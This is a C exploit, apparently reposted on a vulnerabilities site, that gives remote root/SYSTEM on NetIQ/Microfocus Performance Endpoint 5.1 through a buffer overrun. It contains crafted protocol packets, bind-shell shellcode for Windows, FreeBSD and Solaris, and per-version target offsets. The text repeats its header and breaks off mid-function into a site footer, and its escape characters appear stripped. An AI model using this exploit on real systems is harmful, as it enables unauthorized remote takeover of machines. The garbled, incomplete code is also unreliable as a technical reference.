/*
# Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit
# Date: Jun 2007
# Exploit Author: mu-b
# Vendor Homepage: https://www.microfocus.c /*
# Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit
# Date: Jun 2007
# Exploit Author: mu-b
# Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management
# Version: All
# Tested on: Windows / Solaris x86/SPARC
# CVE : 0day
* endpoint-pown-uni.c
*
* Copyright (c) 2007 by <mu-b@digit-labs.org>
*
* NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit
* by mu-b - Jun 2007
*
* $Id: endpoint-pown-uni.c 56 2021-04-23 10:15:49Z mu-b $
*
* - Tested on: NetIQ Performance Endpoint 5.1.15750 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1.15541 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1.15368 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1 (win32)
* NetIQ Performance Endpoint 4.2 (freebsd-x86)
* NetIQ Performance Endpoint 5.1 (solaris-SPARC+noexec-stack)
* (Revised: May 23, 2006)
*
*
* "No executable code (like Java or Visual Basic) is sent. There is no way
* to do something like 'run this command.' 100,000’s of endpoints have been
* installed worldwide without incident."
*
* "Endpoints do rigorous internal validation. For example, endpoints are not
* susceptible to 'buffer overrun' attacks used by hackers."
* - https://tinyurl.com/lgmblyj
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ifaddrs.h>
#include <limits.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#define IPV4_BUFLEN 16 /* "255.255.255.255 " */
#define PORT_SHELL 10000
#define ENDPT_TCP_PORT 10115
#define ENDPT_PKTMAX 0x1388
static char ppkt_buf1[] =
"x06" /* ENDPT_COMMAND_SETUP_E1 */
"x07x14x43x1A" /* verify_get_id (1) */
"x00x22" /* copyright_smart_compare */
"Copyright Ganymede Software Inc."
"x00x03" /* */
"xff" /* code_convert_from_line */
"x00x03" /* */
"xff" /* code_convert_from_line */
"x00" /* */
"x00x02" /* len < 0x80 */
"x00x03" /* len < 0x40 */
"x00" /* len < 0x40 */
"x41x41x41x41x41x41x41x41" /* */
"x41x41x41x41x41x41x41x41" /* */
"x02" /* protocol */
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x41x41x41x41x41x41" /* */
"x00x00x00x01" /* */
"x00x00x00x02" /* 218h */
"x00" /* */
"x01" /* 1ACh */
"x00x00" /* */
"x00" /* 254h */
"x02" /* protocol */
"x00x03" /* len < 0x40 */
"x00"; /* */
static char ppkt_buf1_end[] =
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00"; /* */
static char ppkt_buf2[] =
"x06" /* ENDPT_COMMAND_SETUP_E1 */
"x07x14x43x1A" /* verify_get_id (1) */
"x00x22" /* copyright_smart_compare */
"Copyright Ganymede Software Inc."
"x00x03" /* */
"xff" /* code_convert_from_line */
"x00x03" /* */
"xff" /* code_convert_from_line */
"x02" /* protocol */
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x69" /* 210h */
"x00x00x00x69" /* var_C */
"x00x02" /* */
"x00x00x00x69" /* var_C */
"x00x00x00x69" /* 218h */
"x69" /* */
"x01" /* 1ACh */
"x00x00" /* */
"x69" /* 254h */
"x02" /* protocol */
"x00x03" /* len < 0x40 */
"x00"; /* */
static char ppkt_buf2_end[] =
"x00x03" /* len < 0x40 */
"x00" /* */
"x00x03" /* len < 0x40 */
"x00" /* */
"x69" /* 0A8h */
"x00x03" /* len < 0x40 */
"x00"; /* */
static char cpkt_buf1[] =
"x07"
"AAAA";
static char cpkt_buf2[] =
"x38"
"x00x04"
"AAAA";
static char x86_evil_len[] =
"x11xc0"; /* adc eax, eax */
#define X86_NOP_BYTE 0x90 /* nop */
static char sparc_evil_len[] =
"x10x80x00x3c"; /* ba */
static char sparc_nop[] =
"x01x00x00x00"; /* nop */
static char hammer_buf[] =
"x00x25x38"
"x00x20"
"x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00";
static char win32_x86_bind[] =
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x8e"
"x2bxb7x2ax83xebxfcxe2xf4x72x41x5cx67x66xd2x48xd5"
"x71x4bx3cx46xaax0fx3cx6fxb2xa0xcbx2fxf6x2ax58xa1"
"xc1x33x3cx75xaex2ax5cx63x05x1fx3cx2bx60x1ax77xb3"
"x22xafx77x5ex89xeax7dx27x8fxe9x5cxdexb5x7fx93x02"
"xfbxcex3cx75xaax2ax5cx4cx05x27xfcxa1xd1x37xb6xc1"
"x8dx07x3cxa3xe2x0fxabx4bx4dx1ax6cx4ex05x68x87xa1"
"xcex27x3cx5ax92x86x3cx6ax86x75xdfxa4xc0x25x5bx7a"
"x71xfdxd1x79xe8x43x84x18xe6x5cxc4x18xd1x7fx48xfa"
"xe6xe0x5axd6xb5x7bx48xfcxd1xa2x52x4cx0fxc6xbfx28"
"xdbx41xb5xd5x5ex43x6ex23x7bx86xe0xd5x58x78xe4x79"
"xddx78xf4x79xcdx78x48xfaxe8x43x90x3axe8x78x3excb"
"x1bx43x13x30xfexecxe0xd5x58x41xa7x7bxdbxd4x67x42"
"x2ax86x99xc3xd9xd4x61x79xdbxd4x67x42x6bx62x31x63"
"xd9xd4x61x7axdax7fxe2xd5x5exb8xdfxcdxf7xedxcex7d"
"x71xfdxe2xd5x5ex4dxddx4exe8x43xd4x47x07xcexddx7a"
"xd7x02x7bxa3x69x41xf3xa3x6cx1ax77xd9x24xd5xf5x07"
"x70x69x9bxb9x03x51x8fx81x25x80xdfx58x70x98xa1xd5"
"xfbx6fx48xfcxd5x7cxe5x7bxdfx7axddx2bxdfx7axe2x7b"
"x71xfbxdfx87x57x2ex79x79x71xfdxddxd5x71x1cx48xfa"
"x05x7cx4bxa9x4ax4fx48xfcxdcxd4x67x42x61xe5x57x4a"
"xddxd4x61xd5x5ex2bxb7x2a";
static char freebsd_x86_bind[] =
"x6ax61x58x99x52x68x10x02x27x10x89xe1x52x42x52x42"
"x52x6ax10xcdx80x99x93x51x53x52x6ax68x58xcdx80xb0"
"x6axcdx80x52x53x52xb0x1excdx80x97x6ax02x59x6ax5a"
"x58x51x57x51xcdx80x49x79xf5x50x68x2fx2fx73x68x68"
"x2fx62x69x6ex89xe3x50x54x53x53xb0x3bxcdx80";
static char solaris_sparc_bind[] =
"x9cx2bxa0x07x98x10x20x01x96x1axc0x0bx94x1axc0x0b"
"x92x10x20x02x90x10x20x02x82x10x20xe6x91xd0x20x08"
"xd0x23xbfxf8x21x00x00x89xa0x14x23x10xe0x23xbfxf0"
"xc0x23xbfxf4x92x23xa0x10x94x10x20x10x82x10x20xe8"
"x91xd0x20x08xd0x03xbfxf8x92x10x20x01x82x10x20xe9"
"x91xd0x20x08xd0x03xbfxf8x92x1ax40x09x94x12x40x09"
"x82x10x20xeax91xd0x20x08xd0x23xbfxf8x94x10x20x03"
"x92x10x20x09x94xa2xa0x01x82x10x20x3ex91xd0x20x08"
"x12xbfxffxfcxd0x03xbfxf8x94x1axc0x0bx21x0bxd8x9a"
"xa0x14x21x6ex23x0bxdcxdax90x23xa0x10x92x23xa0x08"
"xe0x3bxbfxf0xd0x23xbfxf8xc0x23xbfxfcx82x10x20x3b"
"x91xd0x20x08";
static char solaris_x86_bind[] =
"xb8xffxffxffxffxbaxfdxffxd8xefxf7xd0xf7xd2x50x52"
"x89xe7x31xdbxf7xe3xb0x02x50x52x52x50x50x50xb0xe6"
"xcdx91x93x6ax10x57x53x52xb0xe8xcdx91x52x53x52xb0"
"xe9xcdx91x52x53x6ax02xb0xeaxcdx91x93x92x99x59x51"
"x52xb0x06xcdx91x51x6ax09x53x52xb0x3excdx91x83xc4"
"x18x49x79xebx52x68x2fx2fx73x68x68x2fx62x69x6ex89"
"xe3x52x53x89xe1x52x52x51x53x52xb0x3bxcdx91";
#define NUM_TARGETS 7
#define ARCH_X86 0
#define ARCH_SPARC 1
struct target_t
{
const char *name;
const char *zshell;
const int zshell_len;
const int zshell_pkt_len;
const int fp_indx;
const int fp_offset;
const int arch;
};
struct target_t targets[] = {
{ "NetIQ Endpoint 5.1.15750 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
{ "NetIQ Endpoint 5.1.15541 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
{ "NetIQ Endpoint 5.1.15368 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x488, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x480, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - FreeBSD (universal)",
freebsd_x86_bind, sizeof freebsd_x86_bind, 0x11c0, 29, 0x3FC, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - Solaris SPARC (universal)",
solaris_sparc_bind, sizeof solaris_sparc_bind, 0x1080, 29, 0x400, ARCH_SPARC },
{ "NetIQ Endpoint 5.1 - Solaris x86 (universal)",
solaris_x86_bind, sizeof solaris_x86_bind, 0x11c0, 29, 0x400, ARCH_X86 },
{0}
};
static const char *quotes[] = {
" "No executable code (like Java or Visual Basic) is sent. There is no way
"
" to do something like 'run this command.' 100,000’s of endpoints have been
"
" installed worldwide without incident."",
" "Endpoints do rigorous internal validation. For example, endpoints are not
"
" susceptible to 'buffer overrun' attacks used by hackers.""
};
static int verbose = 1; /* verbosity */
static int ppid, cpid; /* parent and child process id's */
static int get_localip_getifaddrs (in_addr_t *);
static int sock_send (int, char *, int);
static int sock_recv (int, char *, int);
static int sock_recv_str (int, char *, int);
static void shellami (int);
static void
fatal (void)
{
kill (0, SIGKILL);
exit (EXIT_FAILURE);
}
static int
get_localip_getifaddrs (in_addr_t *ip_addr)
{
struct ifaddrs *ifa_head;
int result;
result = -1;
if (getifaddrs (&ifa_head) == 0)
{
struct ifaddrs *ifa_cur;
for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next)
{
if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL)
{
if (ifa_cur->ifa_addr->sa_family != AF_INET ||
!(ifa_cur->ifa_flags & IFF_UP))
continue;
if (ifa_cur->ifa_flags & IFF_LOOPBACK)
continue;
memcpy (ip_addr,
&((struct sockaddr_in *) ifa_cur->ifa_addr)->sin_addr,
sizeof *ip_addr);
result = 0;
break;
}
}
freeifaddrs (ifa_head);
}
return (result);
}
static int
sock_send (int fd, char *src, int len)
{
int n;
if ((n = send (fd, src, len, 0)) < 0)
{
perror ("send()");
exit (EXIT_FAILURE);
}
return (n);
}
static int
sock_recv (int fd, char *dst, int len)
{
int n;
if ((n = recv (fd, dst, len, 0)) < 0)
{
perror ("recv()");
exit (EXIT_FAILURE);
}
return (n);
}
static int
sock_recv_str (int fd, char *dst, int len)
{
int n = sock_recv (fd, dst, len - 1);
dst[n] = '
NetIQ Microfocus Performance Endpoint 5.1 Remote Root SYSTEM
- Details
- Written by: khalil
- Category: Vulnerabilities
- Hits: 110